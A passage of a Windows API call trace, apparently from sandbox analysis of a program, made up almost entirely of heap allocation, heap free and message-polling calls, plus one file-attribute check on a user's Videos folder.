hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0096.910] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0096.910] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0096.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0096.911] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0096.911] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0096.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0096.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0096.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2290 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0096.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0096.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d58 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0096.911] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0096.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf400 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0096.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0096.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0096.912] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0096.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0096.912] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0096.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0096.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0096.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0096.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0096.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0096.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0096.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.913] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0096.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0096.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0096.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0096.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0096.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0096.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0096.915] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0096.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e78 [0096.915] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x2e) returned 0x4391c78 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2170 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0096.915] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0096.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0096.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0096.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0096.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0096.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0096.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.916] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0096.916] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0096.917] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0096.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0096.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0096.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0096.917] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0096.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0096.917] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0096.917] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0096.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0096.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0096.918] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0096.918] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0096.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0096.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0096.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0096.918] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0096.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.918] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9de8 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0096.919] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0096.919] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0096.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0096.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0096.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0096.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0096.920] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0096.920] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 